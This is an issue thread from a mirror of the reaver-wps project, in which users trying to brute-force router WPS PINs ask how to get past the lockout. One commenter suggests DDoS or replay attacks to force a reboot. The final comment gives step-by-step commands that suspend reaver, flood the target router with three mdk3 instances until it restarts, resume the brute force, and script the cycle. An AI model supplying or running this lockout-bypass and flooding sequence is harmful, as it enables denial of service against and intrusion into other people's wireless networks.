iliktrains / reaver-wps

Automatically exported from code.google.com/p/reaver-wps
0 stars 0 forks source link

will lock and not unlocked anymore #248

Open GoogleCodeExporter opened 8 years ago

GoogleCodeExporter commented 8 years ago
i was attacking a router. but this will lock after 10 attempts. Now that is 
locked for days and I can not prove any pin. Is there any way to unlock?

Original issue reported on code.google.com by demoniod...@gmail.com on 22 Feb 2012 at 6:46

GoogleCodeExporter commented 8 years ago
to me has been the same.

Original comment by demon.ia...@hotmail.com on 23 Feb 2012 at 2:47

GoogleCodeExporter commented 8 years ago
I am also interested in about is there any way to make attack to the locked 
router.
I tried reaver to wps supported router, I got 8%, then router locked, after 
about 4 days it unlocked, then i resumed reaver, got about 16% and now router 
is locked again, but this time it is about 8days aldready.How i understand - 
there is no any way to try atempt, if router is in locked status? Because 
reaver just shows 0x02 error code and trying the same pin over and over.
(Sorry about my English)

Original comment by rolands....@gmail.com on 24 Feb 2012 at 6:13

GoogleCodeExporter commented 8 years ago
Same here which make this attack of no use....

Original comment by lostlogi...@gmail.com on 22 Mar 2012 at 8:21

GoogleCodeExporter commented 8 years ago
Im guessing when this happens the router needs to be rebooted which if you dont 
have physical access to said router you cannot do obviously. In this case If it 
were me I would force whoever has access to the router to reboot it.. maybe 
using a replay attack or possibly a ddos attack on the router itself.

Original comment by str8...@gmail.com on 19 Apr 2012 at 6:29

GoogleCodeExporter commented 8 years ago
1: open a new terminal and write:
killall -s STOP reaver 
airmon-ng start wlan0
airmon-ng start wlan0
mdk3 mon0 x 0 -t XX:XX:XX:XX:XX:XX -n ESSIDOFROUTER -s 200&
mdk3 mon1 x 0 -t XX:XX:XX:XX:XX:XX -n ESSIDOFROUTER -s 200&
mdk3 mon2 x 0 -t XX:XX:XX:XX:XX:XX -n ESSIDOFROUTER -s 200&
2: wait 30 secs
3: write:
killall mdk3
killall -s CONT reaver

that will restart most router and in most cases remove wps lock for another 10 
tries.
3 instanses mdk3 mon0 x0 -t BS:SI:D0:12:34 -n "Essid" -s200
then you just need to do it over uptil 1100 times again.
...or make a script for it:)

Original comment by janniker...@gmail.com on 9 May 2015 at 5:03